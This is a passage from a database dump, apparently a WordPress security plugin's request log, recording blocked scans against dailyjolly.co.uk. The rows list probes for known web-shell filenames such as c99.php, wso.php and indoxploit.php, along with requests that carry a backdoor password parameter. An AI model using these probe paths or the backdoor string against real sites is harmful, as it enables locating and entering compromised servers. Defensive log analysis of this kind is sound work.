(.NET CLR 3.5.30729)\"}','tmuB0pedCYSU6MVvg45zXlo8',0,1674320281.0371,190,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-mna.php?http://dailyjolly.co.uk/wp-mna.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','xcRX21PdBNmWSvIzkCOYeLu8',0,1674320285.3288,174,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/uploads/upload.php?http://dailyjolly.co.uk/uploads/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','5sWFrEMAcS1mURDXJpQIogih',0,1674320288.8653,205,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wpx.php?http://dailyjolly.co.uk/wpx.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','JPSf2cxIg9vpLohyw14lMbaz',0,1674320290.6656,165,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/images/c99.php?http://dailyjolly.co.uk/images/c99.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','1BUOuewh2nEM6aRD8ogPtNYb',0,1674320293.9799,160,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/xhell.php?http://dailyjolly.co.uk/xhell.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','pjV5OZgIawC9fTAomvxutzPD',0,1674320297.4271,205,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/xmrlpc.php?http://dailyjolly.co.uk/xmrlpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','5DvQgXnWF1J9uOcwtlAMoGep',0,1674320298.8524,183,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/xz.php?http://dailyjolly.co.uk/xz.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','zOo3GfjdMF7NCJkiYmaUlT9n',0,1674320301.2600,186,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/yuuki.php?http://dailyjolly.co.uk/yuuki.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','a6EmZ4TecILQpyXoxk58Kvj3',0,1674320302.8043,206,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/plugins/upspy/index.php?http://dailyjolly.co.uk/wp-content/plugins/upspy/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','6lFKT3xyANfqnpkYwjOB4dVb',0,1674320306.1620,196,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/plugins/ubh/index.php?http://dailyjolly.co.uk/wp-content/plugins/ubh/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','nWtSTHfJDwcVjsg2y5mql3ZQ',0,1674320309.1766,226,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/plugins/vwcleanerplugin/bump.php?cache&http://dailyjolly.co.uk/wp-content/plugins/vwcleanerplugin/bump.php?cache','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','FuqHwXImtnUWQpKz87NhaAoE',0,1674320312.0367,171,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/themes/gaukingo/db.php?http://dailyjolly.co.uk/wp-content/themes/gaukingo/db.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','KSCJlLsAfBE6wPpm109XUIgi',0,1674320317.6653,192,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/plugins/three-column-screen-layout/db.php?http://dailyjolly.co.uk/wp-content/plugins/three-column-screen-layout/db.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','7MI0ewdBWKpjPrb2Zm3yFfu4',0,1674320320.5758,179,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/plugins/xichang/x.php?xi&http://dailyjolly.co.uk/wp-content/plugins/xichang/x.php?xi','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','50ZLeWC6r4VoMlI3ztpmNwq2',0,1674320323.6615,185,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/plugins/html404/index.html?http://dailyjolly.co.uk/wp-content/plugins/html404/index.html','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','rBUQux7PORVCnaMfk2DpHj35',0,1674320325.5532,161,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/plugins/wp-db-ajax-made/wp-ajax.php?http://dailyjolly.co.uk/wp-content/plugins/wp-db-ajax-made/wp-ajax.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','kMVD3Hg76BAuCEpXxTWQr50f',0,1674320328.2077,340,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-admin/shapes.php?http://dailyjolly.co.uk/wp-admin/shapes.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','KjxqmfEhV1NWop7GcHbiO6Te',0,1674320330.9157,283,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/XxX.php?http://dailyjolly.co.uk/XxX.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','DsV2Zc69kJKQjg0Erb4G8CtL',0,1674320333.7025,168,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/Marvins.php?http://dailyjolly.co.uk/Marvins.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','aWyTXiBK7PEgcF6AwuxrHqv4',0,1674320335.8724,167,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-includes/css/modules.php?http://dailyjolly.co.uk/wp-includes/css/modules.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','04x6hfotUSDJRY7OW5CyAQiZ',0,1674320338.9094,189,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/olux.php?http://dailyjolly.co.uk/olux.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','BQ4rC2DdtewSc53AEqkGUzOI',0,1674320343.8340,190,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/indoxploit.php?http://dailyjolly.co.uk/indoxploit.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','qwBp5ZUQC4oVsO6vHDn2yjrz',0,1674320346.6757,171,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wso.php?http://dailyjolly.co.uk/wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','tK8hTnrLwlzAoFyVN9sMjxQe',0,1674320349.0909,217,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/plugins/css-ready-sel/file.php?http://dailyjolly.co.uk/wp-content/plugins/css-ready-sel/file.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','35U0KwSWAFeYZDR9fGO2agyt',0,1674320352.8680,179,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/plugins/css-ready/file.php?http://dailyjolly.co.uk/wp-content/plugins/css-ready/file.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','3H6jhozOZ2KdJPif0MNGUYvC',0,1674320355.7917,181,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/think.php?http://dailyjolly.co.uk/wp-content/think.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','19ldaEn6DYwIArJWmKu2kGhz',0,1674320358.9105,163,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/plugins/upspy/con.php?http://dailyjolly.co.uk/wp-content/plugins/upspy/con.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','gb5AD0csR8ovFhCXISlLtHT3',0,1674320363.0407,171,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/plugins/upspy/up.php?http://dailyjolly.co.uk/wp-content/plugins/upspy/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','C8Zb7BE6jsoFYGQiOeLJ095D',0,1674320367.3367,187,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/plugins/upspy/sllolx.php?http://dailyjolly.co.uk/wp-content/plugins/upspy/sllolx.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','hAa8ClomSn6XONGg147ruMiR',0,1674320370.8263,227,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-commentin.php?http://dailyjolly.co.uk/wp-commentin.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','yAPfoV7UBmx0DbRFiuMK6ISL',0,1674320372.9988,229,'','GET',403,0,700,0,1,'',0),('104.243.43.10',1760766730,'','https://www.dailyjolly.co.uk/wp-plain.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','yBLCdKeUhr4qI3bHkTOzEAJN',0,1674328919.0758,594,'','POST',403,0,700,0,1,'',0),('104.243.43.10',1760766730,'','https://www.dailyjolly.co.uk/atnbqmuy.php?Fox=d3wL7','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','LWlJwbs2XOphuNUFZEq0ten1',0,1674328919.7865,181,'','GET',403,0,700,0,1,'',0),('20.210.237.151',349367703,'','https://www.dailyjolly.co.uk/wp-plain.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','UzvTtLf86eDIq5Woyl23chH7',0,1674337438.4386,849,'','POST',403,0,700,0,1,'',0),('20.210.237.151',349367703,'','https://www.dailyjolly.co.uk/pirrlruq.php?Fox=d3wL7','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','qZt9z41C6Kkmriua2UXb3hng',0,1674337439.5652,330,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/.sts.php','','{\"1\":\"python-requests\\/2.28.1\"}','HVQhKwr4v8TbPIM9cBDEnFje',0,1674339894.5815,216,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/.Wp-back.phP','','{\"1\":\"python-requests\\/2.28.1\"}','6SYBo2xreIspqK8EjilvyWTG',0,1674339895.5951,185,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/fx.php','','{\"1\":\"python-requests\\/2.28.1\"}','S1uTl4dVIw3DyAvmibC2e856',0,1674339896.5346,174,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/shx.php','','{\"1\":\"python-requests\\/2.28.1\"}','2FwqDntVpQE0rhgulfZ1BMy8',0,1674339897.5600,167,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp_content/wp-1ogin_bak.php','','{\"1\":\"python-requests\\/2.28.1\"}','1l9PmyC3OftjULgx6Q7XqVwe',0,1674339898.4786,166,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wso112233.php','','{\"1\":\"python-requests\\/2.28.1\"}','CFU4GE25B70XkenJSpaVLRgN',0,1674339899.4285,173,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/bala.php','','{\"1\":\"python-requests\\/2.28.1\"}','lkFmpCoDjXxYH5UaqBZIzE3O',0,1674339900.3745,163,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/mini.php','','{\"1\":\"python-requests\\/2.28.1\"}','WqEyQxUZ914awLvJoblHKG7e',0,1674339901.8481,164,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/xleet.php','','{\"1\":\"python-requests\\/2.28.1\"}','Uf2Il6muCcvZNOyDoMeG4xV9',0,1674339902.8065,171,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-class.php','','{\"1\":\"python-requests\\/2.28.1\"}','UmA5FpVjP0YdenXqxiy3GWcQ',0,1674339903.7497,164,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/x.php','','{\"1\":\"python-requests\\/2.28.1\"}','iOYy6nVaeKx0s5kTSCzWj41N',0,1674339904.6843,227,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/0z.php','','{\"1\":\"python-requests\\/2.28.1\"}','nOUPZNb71I9DEjmKfgYM3hCV',0,1674339905.6902,174,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/m.php','','{\"1\":\"python-requests\\/2.28.1\"}','54NHKdVlSM3YaI1fhnv0DZCj',0,1674339906.7686,176,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/a.php','','{\"1\":\"python-requests\\/2.28.1\"}','ekwJyu85OLbKoYiAr26mFsfT',0,1674339907.7664,171,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/b.php','','{\"1\":\"python-requests\\/2.28.1\"}','XteqbmFZu78Qh1lRTVonjBIH',0,1674339908.7410,156,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/c.php','','{\"1\":\"python-requests\\/2.28.1\"}','fjKLwbTnP4ACFBezEa71M5t9',0,1674339909.7147,179,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp.php','','{\"1\":\"python-requests\\/2.28.1\"}','6XdiTt1MrZBxaNhSE20Yykj3',0,1674339910.6532,174,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/mar.php','','{\"1\":\"python-requests\\/2.28.1\"}','T4znJ8yRwC7dU1xYkp2FAQHK',0,1674339911.6279,198,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/p.php','','{\"1\":\"python-requests\\/2.28.1\"}','6wdmpfyAHsBco4MFgjOzkv5C',0,1674339912.6316,178,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/t.php','','{\"1\":\"python-requests\\/2.28.1\"}','BYp1WErgVRD95FPAHzo3atTv',0,1674339913.6466,189,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/o.php','','{\"1\":\"python-requests\\/2.28.1\"}','zVuCidqfjLng7l2HAKUDPoFT',0,1674339914.5945,199,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/w.php','','{\"1\":\"python-requests\\/2.28.1\"}','pEiPaS7GeLlcnIMywtvoAqgN',0,1674339915.5577,176,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/confiig.php','','{\"1\":\"python-requests\\/2.28.1\"}','ebHBNMK21hv3O4QnuToqsRAC',0,1674339916.5074,217,'','GET',403,0,700,0,1,'',0),('104.243.43.10',1760766730,'','https://www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/themes\\/seotheme\\/db.php?u\"}','PBnFVKAqTazEcZJOp7j2mUs8',0,1674341797.7508,280,'','GET',403,0,700,0,1,'',0),('104.243.43.10',1760766730,'','https://www.dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/plugins\\/seoplugins\\/mar.php\"}','e8URazVs5Z01TpQHPENwCqif',0,1674341798.8253,1087,'','GET',403,0,700,0,1,'',0),('104.243.43.10',1760766730,'','https://www.dailyjolly.co.uk/wp-content/themes/seotheme/mar.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/themes\\/seotheme\\/mar.php\"}','Q4FGTgsVILf8My9RiHj26eXa',0,1674341800.1927,288,'','GET',403,0,700,0,1,'',0),('104.243.43.10',1760766730,'','https://www.dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/plugins\\/ioptimization\\/IOptimize.php?rchk\"}','7GO3qcWnCzHkiIytgK0UjDA6',0,1674341801.7171,262,'','GET',403,0,700,0,1,'',0),('104.243.43.10',1760766730,'','https://www.dailyjolly.co.uk/wp-content/themes/alera/alpha.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/themes\\/alera\\/alpha.php\"}','q0dJ8iWblU2sGjvQu9P6pTm1',0,1674341802.1649,292,'','GET',403,0,700,0,1,'',0),('104.243.43.10',1760766730,'','https://www.dailyjolly.co.uk/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282\"}','QVJ0mWcxECog8RKFvIGX93HN',0,1674341802.7155,249,'','GET',403,0,700,0,1,'',0),('104.243.43.10',1760766730,'','https://www.dailyjolly.co.uk/wp/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/wp\\/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282\"}','laU9d8ZOPhzkf1W0KIMXTeji',0,1674341803.1623,209,'','GET',403,0,700,0,1,'',0),('104.243.43.10',1760766730,'','https://www.dailyjolly.co.uk/wordpress/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/wordpress\\/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282\"}','oX4rIS5GBR1VZA2sFH7eNQ9p',0,1674341803.5295,251,'','GET',403,0,700,0,1,'',0),('104.243.43.10',1760766730,'','https://www.dailyjolly.co.uk/blog/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/blog\\/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282\"}','sBYIKl5pU3JhzeWCjxgdLbvn',0,1674341803.9551,234,'','GET',403,0,700,0,1,'',0),('104.243.43.10',1760766730,'','https://www.dailyjolly.co.uk/site/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/site\\/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282\"}','CQyaDhARVI4qjvGnL1TZkBuP',0,1674341804.3570,193,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/.well-known/freshtools.net.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/.well-known\\/\\/freshtools.net.php\"}','wqtGsK2rc1IE063zjnfHkDOP',0,1674344546.3911,202,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/.well-known/gindex.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/.well-known\\/\\/gindex.php\"}','EZ8bpq5AuU4GghilcarVSnzL',0,1674344546.7460,182,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/.well-known/img.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/.well-known\\/\\/img.php\"}','xsD5I0VGYojAmy1F2CUW4BcK',0,1674344547.0758,182,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/.well-known/seo.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/.well-known\\/\\/seo.php\"}','XPQLyHpOneCjc3ZUotuAGWV4',0,1674344547.4163,207,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/.well-known/subirfoto.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/.well-known\\/\\/subirfoto.php\"}','vgQmHuSIrG7lJ48KpeEdUFqz',0,1674344547.7721,174,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/.well-known/acme-challenge/licsy.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/.well-known\\/acme-challenge\\/licsy.php\"}','Zg39QT8O2fJjmhwx6aUiR0uM',0,1674344548.1293,209,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/.well-known/acme-challenge/makeasmtp.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/.well-known\\/acme-challenge\\/makeasmtp.php\"}','gNy7rEMUH3tsnSQT2qmzFAf9',0,1674344548.4961,238,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/.well-known/acme-challenge/wp-signup.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/.well-known\\/acme-challenge\\/wp-signup.php\"}','TdtMpcjb5Lkr40SfUJgZYoxG',0,1674344548.9823,197,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/.well-known/pki-validation/%20.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/.well-known\\/pki-validation\\/%20.php\"}','q82fT5GsER4AnB7DLQVm1xhO',0,1674344549.3473,288,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/.well-known/pki-validation/bala.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/.well-known\\/pki-validation\\/bala.php\"}','S2YM1sCVk0RtuzpyGaJLhfX5',0,1674344549.8047,209,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/.well-known/pki-validation/p.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/.well-known\\/pki-validation\\/p.php\"}','vXt0CYBme2AL5yrKQzWJ1M6F',0,1674344550.1808,194,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/.well-known/pki-validation/psp.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/.well-known\\/pki-validation\\/psp.php\"}','vsnWQ8xrTJ3uf0AUjpKGPhk5',0,1674344550.5320,193,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/.well-known/pki-validation/sdf-dffg.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/.well-known\\/pki-validation\\/sdf-dffg.php\"}','yOn0UevLQ5BRSKW1NdVF7IfY',0,1674344550.8913,177,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/.well-known/pki-validation/wp-signup.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/.well-known\\/pki-validation\\/wp-signup.php\"}','FRExWlQGpaDdXqjmVAKki6wY',0,1674344551.2374,216,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/.well-known/pki-validation/z88x/0z.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\